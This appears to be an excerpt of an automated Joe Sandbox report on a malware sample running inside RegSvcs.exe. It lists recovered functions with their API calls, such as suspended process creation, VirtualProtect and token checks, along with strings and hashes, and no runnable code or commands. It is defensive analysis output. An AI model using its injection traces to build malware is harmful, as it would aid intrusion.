Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(05C744CC,00000018,00000000,00000004,05C744CC), ref: 05C751EF

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 3674e34a9a596abba8523938440ad6d64e0875cae0980f8e86eac37eb130b6fa
Instruction ID: 2ba0ad833f9c5c5ce2ffb941d3b708bf5c936cb6e637cc0c32e7b345262fc129
Opcode Fuzzy Hash: 3674e34a9a596abba8523938440ad6d64e0875cae0980f8e86eac37eb130b6fa
Instruction Fuzzy Hash: 16F01272B6020CBBFB50DBB5DC4BF593BACA700685F1449A9F501A9880FEB4D694E790

Function 0196A048 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2386349298.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 739e67188a994f2bcc79899b02dc3790004bf2c3ae9f31375d260fc3f96e9180
Instruction ID: dff4829ce4fb078e70421458326cb0251767b2ce7e05e35d57cd920769c6cf53
Opcode Fuzzy Hash: 739e67188a994f2bcc79899b02dc3790004bf2c3ae9f31375d260fc3f96e9180
Instruction Fuzzy Hash: EEC17D71E0051A8BCB05CBA8C9806ADFBF6FF88305F18C669D459E7246D774E942CBA0

Function 05C76B06 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 241
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

time.MSVCRT(00000000), ref: 05C76B18
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 05C76B4E
wcsrchr.NTDLL ref: 05C76B61
wcschr.NTDLL ref: 05C76B72
lstrlenW.KERNEL32(00000002), ref: 05C76B85
CloseHandle.KERNEL32(?), ref: 05C76CDE
SetEnvironmentVariableW.KERNEL32(05C7D9DC,05C7D9F0), ref: 05C76D73
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 05C76D86

Part of subcall function 05C7440E: calloc.MSVCRT ref: 05C7447A
Part of subcall function 05C7440E: memset.NTDLL ref: 05C744AF
Part of subcall function 05C7440E: GetCurrentProcess.KERNEL32 ref: 05C744C0

IsBadCodePtr.KERNEL32(?), ref: 05C76DCD

Strings

, xrefs: 05C76BF8
!RHY, xrefs: 05C76BD5

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: FileModuleName$CloseCodeCurrentEnvironmentHandleProcessVariablecalloclstrlenmemsettimewcschrwcsrchr
String ID: $!RHY
API String ID: 3553638992-3750638473
Opcode ID: d7f9d3a0cd6b8882ba88f81c4e58e130ac8f734139691aa56cdab97123fc2eff
Instruction ID: 92a8a9e37b87989a438d51745e194934804c0cd9ff59b0308ef357ab790f2d8e
Opcode Fuzzy Hash: d7f9d3a0cd6b8882ba88f81c4e58e130ac8f734139691aa56cdab97123fc2eff
Instruction Fuzzy Hash: F081A27291061DAFDF319FA4CC86AEEBBB9FB14304F104CAAE55692840D774DBC49B50

Function 05C77931 Relevance: 19.7, APIs: 13, Instructions: 161
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 05C7794E
GetFileSize.KERNEL32(00000000,00000000,00000000,00000000), ref: 05C77964
calloc.MSVCRT ref: 05C77978
ReadFile.KERNELBASE(?,00000000,00001000,?,00000000), ref: 05C77991
calloc.MSVCRT ref: 05C77A0A
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 05C77A23
calloc.MSVCRT ref: 05C77A5C
SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 05C77A75
ReadFile.KERNELBASE(?,00000000,?,?,00000000), ref: 05C77A8A
free.MSVCRT ref: 05C77AA3
free.MSVCRT ref: 05C77AFD
free.MSVCRT ref: 05C77B07
CloseHandle.KERNELBASE(?), ref: 05C77B11

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: File$callocfree$PointerRead$CloseCreateHandleSize
String ID:
API String ID: 3445818913-0
Opcode ID: 16d87dbf8a8d9c890b5e24f8b052e54a9fd9afe0b838b488fc05dc860a1e9f41
Instruction ID: 59f80996b611c26b126deda8faf0e976397a1168dd30a9a14dcf8ddf343d6dbb
Opcode Fuzzy Hash: 16d87dbf8a8d9c890b5e24f8b052e54a9fd9afe0b838b488fc05dc860a1e9f41
Instruction Fuzzy Hash: D251507190020DFFEF219FA4DC88EBA7BADFB01354F108869F51996551DB709E84CBA0

Function 05C76800 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 05C76807

Part of subcall function 05C75202: malloc.MSVCRT ref: 05C752CB
Part of subcall function 05C75202: malloc.MSVCRT ref: 05C752FD

RtlAllocateHeap.NTDLL(?,00000008,?), ref: 05C768D3
GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,00000104), ref: 05C769BF
lstrlenW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe), ref: 05C769C6
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,?,00000000), ref: 05C769EB
MapViewOfFile.KERNELBASE(00000000,00000002,00000000,00000000,00000000), ref: 05C76A05
UnmapViewOfFile.KERNEL32(?), ref: 05C76A97

Part of subcall function 05C77E1C: calloc.MSVCRT ref: 05C77E38
Part of subcall function 05C77E1C: rand.MSVCRT ref: 05C77E95
Part of subcall function 05C77E1C: free.MSVCRT ref: 05C77EED
Part of subcall function 05C77E1C: memset.NTDLL ref: 05C77F05

CloseHandle.KERNEL32(00000001), ref: 05C76AF1
free.MSVCRT ref: 05C76AFA

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, xrefs: 05C769AE, 05C769BC, 05C769C5, 05C76A74

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: File$HeapViewfreemalloc$AllocateCloseCreateHandleMappingModuleNameProcessUnmapcalloclstrlenmemsetrand
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
API String ID: 1278399860-4009286469
Opcode ID: 4aa330367801c3bb94fe37a89cda4764568f944e39f96aec94cedc3d41529552
Instruction ID: 6f803064b97a67703c016ec1a36ca301d75ce3895f6ab807a8164d36585d8f95
Opcode Fuzzy Hash: 4aa330367801c3bb94fe37a89cda4764568f944e39f96aec94cedc3d41529552
Instruction Fuzzy Hash: E991A3B1A0460EBFDF149FB4DC4AAAE7BB9FF04314F144D19F41696950EB709980EB90

Function 05C77E1C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 212
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

calloc.MSVCRT ref: 05C77E38
rand.MSVCRT ref: 05C77E95
free.MSVCRT ref: 05C77EED
memset.NTDLL ref: 05C77F05
TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 05C77FF2
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05C78001
CloseHandle.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 05C78006

Part of subcall function 05C776B5: QueryPerformanceCounter.KERNEL32(?,?,?,00000000,?,?,?,05C75F18,?,?,?,?,?,?,05C74E15,00000000), ref: 05C776D3

free.MSVCRT ref: 05C7801E

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, xrefs: 05C77E25
,, xrefs: 05C77E68

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: CloseHandlefree$CounterPerformanceProcessQueryTerminatecallocmemsetrand
String ID: ,$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
API String ID: 2135474706-755317693
Opcode ID: f4aec1e866e4ec8bd3259dca9b5c61703beb553e4abf2576b85337952586991f
Instruction ID: 9038f9e67eaa1994842c697b369f06627d8a78f22e98e896b2cadf92672aa53f
Opcode Fuzzy Hash: f4aec1e866e4ec8bd3259dca9b5c61703beb553e4abf2576b85337952586991f
Instruction Fuzzy Hash: 36614CB2E0021DAFDB10DFA9DC89AEF7BB9EF48610F144815F909A7600E7309951DBA1

Function 05C7802A Relevance: 12.1, APIs: 8, Instructions: 114
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 05C7807D
GetFileAttributesExW.KERNEL32(05C7E584,00000000,?), ref: 05C7809F
CreateProcessW.KERNELBASE(05C7E584,00000000,00000000,00000000,00000000,08000004,00000000,00000000,?,05C76AE6), ref: 05C780C4
GetLastError.KERNEL32 ref: 05C780CD
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 05C780F2
GetFileAttributesExW.KERNEL32(?,00000000,?), ref: 05C78108
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,08000004,00000000,00000000,?,05C76AE6), ref: 05C78131
GetLastError.KERNEL32 ref: 05C7813A

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastProcess$EnvironmentExpandInfoStartupStrings
String ID:
API String ID: 990425220-0
Opcode ID: 6cc7d4314abfde5c11ace2be6019e7879c49b97bc080b7ee9af0acf20e14eb95
Instruction ID: c9eaf321adfcca44dbc864a8c8d2eb4b12e2ed2d667ccdcfa80b88309657947d
Opcode Fuzzy Hash: 6cc7d4314abfde5c11ace2be6019e7879c49b97bc080b7ee9af0acf20e14eb95
Instruction Fuzzy Hash: 864117B190121DABDF21DFA5CC899EE7FB9FF01290F50482AF659D6540DA309A81DBA0

Function 05C756A7 Relevance: 12.1, APIs: 8, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(?,00000008,05C755D0,00000000,74DF2E80,00000000,?,?,05C755D0,00000000,?,?,00000000,00000000,05C7D278), ref: 05C756B9
GetTokenInformation.KERNELBASE(05C755D0,00000019(TokenIntegrityLevel),00000000,00000000,?,?,?,05C755D0,00000000,?,?,00000000,00000000,05C7D278), ref: 05C756D4
GetLastError.KERNEL32(?,?,05C755D0,00000000,?,?,00000000,00000000,05C7D278), ref: 05C756DA
malloc.MSVCRT ref: 05C756E8
GetTokenInformation.KERNELBASE(05C755D0,00000019(TokenIntegrityLevel),00000000,?,?,?,05C755D0,00000000,?,?,00000000,00000000,05C7D278), ref: 05C75702
GetSidSubAuthorityCount.ADVAPI32(00000000,?,05C755D0,00000000,?,?,00000000,00000000,05C7D278), ref: 05C7570A
GetSidSubAuthority.ADVAPI32(00000000,?,?,05C755D0,00000000,?,?,00000000,00000000,05C7D278), ref: 05C7571A
free.MSVCRT ref: 05C75723

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Token$AuthorityInformation$CountErrorLastOpenProcessfreemalloc
String ID:
API String ID: 245793178-0
Opcode ID: c94847ee2545ea3127023c4cb763917f7f9a0e2c7405ee49aa603b0c8fdc3975
Instruction ID: 6f54a767334a23e9081c2eff43ff50a46731023c7d4c61208ad9c5cade64262b
Opcode Fuzzy Hash: c94847ee2545ea3127023c4cb763917f7f9a0e2c7405ee49aa603b0c8fdc3975
Instruction Fuzzy Hash: F311393611010DFFEB105FA0ED89EAA7F7DFB487A0B108065F901D6550EF719E00DAA0

Function 05C766F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,?,00000000,00000001,?), ref: 05C76732
RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 05C7674D
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 05C7678B
RegCloseKey.KERNELBASE(?), ref: 05C767F2

Part of subcall function 05C7651C: _alloca_probe.NTDLL ref: 05C7652F
Part of subcall function 05C7651C: memset.NTDLL ref: 05C76544

RegSetValueExW.KERNELBASE(?,00000000,00000000,00000003,?,00000040), ref: 05C767D9

Strings

@, xrefs: 05C76779

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Value$CloseCreateOpenQuery_alloca_probememset
String ID: @
API String ID: 163476824-2766056989
Opcode ID: d6398741cf0251801381a9b4179d5786719f04362ce2e25dfa63dc6beebea9b1
Instruction ID: a97c45f142b949b8368b4a5303e5eedf3b298cbaca5e04eab3e0952874019ade
Opcode Fuzzy Hash: d6398741cf0251801381a9b4179d5786719f04362ce2e25dfa63dc6beebea9b1
Instruction Fuzzy Hash: CF31197190010DBBDF219FA2CC49EAF7F79FB80794F044869FA15A5550E7718A40EBA0

Function 05C75202 Relevance: 6.4, APIs: 5, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 05C752CB
malloc.MSVCRT ref: 05C752FD
rand.MSVCRT ref: 05C75342
free.MSVCRT ref: 05C7539A
free.MSVCRT ref: 05C753A0

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: freemalloc$rand
String ID:
API String ID: 2031093290-0
Opcode ID: baa46d152a642f4d7e3acb8f99c218528c9cf584d02178e18a2797171db49042
Instruction ID: 6e5c86272d410a9ee5d88466051c9a22aaf38343831c6511872831ec377696f2
Opcode Fuzzy Hash: baa46d152a642f4d7e3acb8f99c218528c9cf584d02178e18a2797171db49042
Instruction Fuzzy Hash: C8510672D00129AFDB14CBA8D881ABEBBF6FF44300F18885AF95997611D771DA00DB90

Function 05830042 Relevance: 4.6, APIs: 3, Instructions: 135
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000008,?), ref: 05830088
RtlAllocateHeap.NTDLL(?,00000008,?), ref: 05830155
RtlFreeHeap.NTDLL(?,00000000,?,?,?,?,00000000), ref: 05830180

Memory Dump Source

Source File: 00000005.00000002.2403174105.0000000005830000.00000040.00001000.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5830000_RegSvcs.jbxd

Similarity

API ID: Heap$Allocate$Free
String ID:
API String ID: 4277724868-0
Opcode ID: 08cf8e03b6d0363485821097fafb167ff7731e56f063e696cb54c532aa5d098f
Instruction ID: 28bd0b28932810059dc4ed9cb8e5b0ade06184e1854807a476372b2683ebe96e
Opcode Fuzzy Hash: 08cf8e03b6d0363485821097fafb167ff7731e56f063e696cb54c532aa5d098f
Instruction Fuzzy Hash: AB513F71900709EFDB21EFA4C889EEFBBB9FF44744F14452AE945E6241D770AA40CB90

Function 05C789CD Relevance: 4.6, APIs: 3, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 05C7B28B: GetCurrentProcess.KERNEL32(00000022,00000000,00000004,?,05C78A28,?), ref: 05C7B2BB
Part of subcall function 05C7B28B: NtQueryInformationProcess.NTDLL(00000000), ref: 05C7B2C2

Part of subcall function 05C7B701: GetProcessHeap.KERNEL32(?,?,?,?,?,05C78A40,?,?,?,00000000,?), ref: 05C7B706
Part of subcall function 05C7B701: IsBadReadPtr.KERNEL32(?,?), ref: 05C7B75B
Part of subcall function 05C7B701: RtlAllocateHeap.NTDLL(?,00000008,?), ref: 05C7B76E
Part of subcall function 05C7B701: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,05C78A40,?,?,?,00000000,?), ref: 05C7B79D
Part of subcall function 05C7B701: RtlAllocateHeap.NTDLL(?,00000008,?), ref: 05C7B7B8

Part of subcall function 05C776B5: QueryPerformanceCounter.KERNEL32(?,?,?,00000000,?,?,?,05C75F18,?,?,?,?,?,?,05C74E15,00000000), ref: 05C776D3

TlsAlloc.KERNEL32(?,?), ref: 05C78A4E
SetErrorMode.KERNELBASE(00008003), ref: 05C78A6E
VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 05C78A80

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: HeapProcess$AllocateQueryVirtual$AllocCounterCurrentErrorFreeInformationModePerformanceProtectRead
String ID:
API String ID: 1833035633-0
Opcode ID: d3a34d5fbeaa98e1ecee948259e057df5f3419fc3c249134acbc794ac5f963c6
Instruction ID: f236915bdd3e7dfe15924cf21c13252f1fca8d2d6e5130b170f323f386629913
Opcode Fuzzy Hash: d3a34d5fbeaa98e1ecee948259e057df5f3419fc3c249134acbc794ac5f963c6
Instruction Fuzzy Hash: D3113D72A0020EBADF11BBE09D09DDE7F6CAF08614F044860FA15A5850EA75DA50EBB1

Function 05C7B3E2 Relevance: 4.6, APIs: 3, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(00000001,00000004,00000040,?,?,?,?,?,?,02EB5806,?,?), ref: 05C7B43E
InterlockedExchange.KERNEL32(00000001,?), ref: 05C7B453
VirtualProtect.KERNELBASE(00000001,00000004,?,?,?,?,?,?,?,02EB5806,?,?), ref: 05C7B463

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$ExchangeInterlocked
String ID:
API String ID: 4062491468-0
Opcode ID: 91d01d0915ef10094fd833821afac471e97f741decb0c4df971d29b9e0033424
Instruction ID: 603d0f3006536fa845830624da205c0d36c64a9f2641a61eec6f7600d49139b2
Opcode Fuzzy Hash: 91d01d0915ef10094fd833821afac471e97f741decb0c4df971d29b9e0033424
Instruction Fuzzy Hash: 8D118EB260021EAFDB119F689C05FAA3FACEF44658F054420FE0997560EA31DD15CBE0

Function 05C75731 Relevance: 4.5, APIs: 3, Instructions: 31COMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32(?,00000008,05C75611,?,00000000,00000000,?,05C75611,00000000,?,?,00000000,00000000,05C7D278), ref: 05C75745
GetTokenInformation.KERNELBASE(05C75611,00000014(TokenIntegrityLevel),?,00000004,?,?,05C75611,00000000,?,?,00000000,00000000,05C7D278), ref: 05C7575E
CloseHandle.KERNELBASE(05C75611,?,05C75611,00000000,?,?,00000000,00000000,05C7D278), ref: 05C7576E

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Token$CloseHandleInformationOpenProcess
String ID:
API String ID: 4232945836-0
Opcode ID: 0b958ad495f6c7a2314810ad5c6640a28b5f27b9886c75d87bd79fb209132780
Instruction ID: 46aece5ac91b7f1b4b62c324d88c590c6d02bd8626f33c020f16f36445d5863b
Opcode Fuzzy Hash: 0b958ad495f6c7a2314810ad5c6640a28b5f27b9886c75d87bd79fb209132780
Instruction Fuzzy Hash: 4EF0D47661011CFBDB118F90DD46ADA7F7CEB04A90F004056BA06AA490DA709F04DBE0

Function 05C742B0 Relevance: 2.6, APIs: 2, Instructions: 50COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 05C742BB
free.MSVCRT ref: 05C7430C

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: callocfree
String ID:
API String ID: 306872129-0
Opcode ID: 26576dd0b209d02eac62f3bbce3b59ccbab0b9f3cf695c5c3b25bc18c2ae3b55
Instruction ID: 182ffdaf9933bd60c9ea6096f770e10129679df79066b406940928ef31b96eda
Opcode Fuzzy Hash: 26576dd0b209d02eac62f3bbce3b59ccbab0b9f3cf695c5c3b25bc18c2ae3b55
Instruction Fuzzy Hash: 0A01F97620055E7BDF195F95EC48D9F3F29FF866A0F14016AFA0946A01D6228921C7F4

Function 0652AB60 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0652ABD3

Memory Dump Source

Source File: 00000005.00000002.2410577664.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_64e0000_RegSvcs.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 48b4867feba1533c9cb48db0223a4e1bd19c7448b8ba18a208ca08628acd2fc1
Instruction ID: 147d941770963743b2233265acfe5b4ea63e01131c6e88e6ca4e09e35fdcd778
Opcode Fuzzy Hash: 48b4867feba1533c9cb48db0223a4e1bd19c7448b8ba18a208ca08628acd2fc1
Instruction Fuzzy Hash: AF2103B5C003499FCB10DF9AC884ADEFBF5FB48320F108429E958A7241D778AA44CFA1

Function 01965868 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 019658E3

Memory Dump Source

Source File: 00000005.00000002.2386349298.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 77148faea1b28d943bc9b7ac2210e477ea123ef6c22f8aa02d49239f09761e1a
Instruction ID: 9417cefedad888ce7ec77818d010133624fcd5e429ac0f64fe532eb5a49e70de
Opcode Fuzzy Hash: 77148faea1b28d943bc9b7ac2210e477ea123ef6c22f8aa02d49239f09761e1a
Instruction Fuzzy Hash: 2D11D3B59003499FCB10DF9AD484ADEFBF4FB48310F108429E559A7651C775AA44CFA1

Function 01965870 Relevance: 1.6, APIs: 1, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 019658E3

Memory Dump Source

Source File: 00000005.00000002.2386349298.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 18da1eb170ed4377439ee26ad8ec1bae395a932b9ef2e2470717402f46003ddd
Instruction ID: 706d3312dd8a735b41dda0d04562afc7efa80a8493b6c3b2ad2192f310f5832a
Opcode Fuzzy Hash: 18da1eb170ed4377439ee26ad8ec1bae395a932b9ef2e2470717402f46003ddd
Instruction Fuzzy Hash: A211C3B5D003499FCB10DF9AD884ADEFBF8FB48320F108429E959A7650C775A944CFA1

Function 05C7B869 Relevance: 1.5, APIs: 1, Instructions: 29libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 05C7B8A8

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1a734fa39d9668b3a0edac52c25a3d2d4a3b912e82c79b0be01d50e5fa09b35b
Instruction ID: 9fddf77265983336aca109be5be0c7540c71d24b8969870c780971da1ea2f144
Opcode Fuzzy Hash: 1a734fa39d9668b3a0edac52c25a3d2d4a3b912e82c79b0be01d50e5fa09b35b
Instruction Fuzzy Hash: 62F0307190031CABDF10AFA4CC48AEA7BBCBF04308F144819FD51E2540FB70EA148B94

Function 0196591A Relevance: 1.3, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 0196597F

Memory Dump Source

Source File: 00000005.00000002.2386349298.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5c171cb56d51ff8cbcf1324d014a143a27403dc2ada6430f45eb5e048f48dcee
Instruction ID: 013156d1fc752dbd03833539d9e0dd28582818bcabe57b894007c3e0603fc440
Opcode Fuzzy Hash: 5c171cb56d51ff8cbcf1324d014a143a27403dc2ada6430f45eb5e048f48dcee
Instruction Fuzzy Hash: C411FEB18043498FDB10DF9AC888BDEFBF8EB89320F25845AD558A7240C775A944CFA5

Function 01965920 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 0196597F

Memory Dump Source

Source File: 00000005.00000002.2386349298.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 2466fa4e7061c53741f2a1ab40f38b26d03d3ff9683f487ca23022e0099a4d2e
Instruction ID: d5ddbb2afbfbfd7cea07ffc4647d8de6c00a27019665f787e06a5359befd554b
Opcode Fuzzy Hash: 2466fa4e7061c53741f2a1ab40f38b26d03d3ff9683f487ca23022e0099a4d2e
Instruction Fuzzy Hash: C21112B18003498FDB10DF9AC848BDEFBF8EB49320F20845AD518A7340C775A944CFA5

Function 017CD01C Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2385423281.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_17cd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb9a39aeda1353e68ae2e1703a80f02e9dfae7eb257d65befb315a61ff947897
Instruction ID: 970fb845c9cbd6c942f48fa4940f772a6416285df532d28a325c189cfed5e595
Opcode Fuzzy Hash: bb9a39aeda1353e68ae2e1703a80f02e9dfae7eb257d65befb315a61ff947897
Instruction Fuzzy Hash: B321D0B1604204DFDB25DF68C984B26FBA5EB84754F20C6BDD90A4B352C236D887C6A2

Function 017CD017 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2385423281.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_17cd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bba1b886c7af03120d174dc7deae98a13e2b30171c5fb19a59aa5d286d4f618
Instruction ID: b63c6ea69c4dcd0cac5af670b8650cac4ee89a54cf0aed8c255f990d618d17a8
Opcode Fuzzy Hash: 2bba1b886c7af03120d174dc7deae98a13e2b30171c5fb19a59aa5d286d4f618
Instruction Fuzzy Hash: 7011DD75504284CFDB22CF18C5C4B15FFA1FB84718F24C6ADD8494B652C33AD88ACB92

Non-executed Functions

Function 05C7440E Relevance: 83.1, APIs: 45, Strings: 2, Instructions: 867memorytimestringCOMMON

Download Yara Rule

APIs

Part of subcall function 05C75202: malloc.MSVCRT ref: 05C752CB
Part of subcall function 05C75202: malloc.MSVCRT ref: 05C752FD

calloc.MSVCRT ref: 05C7447A
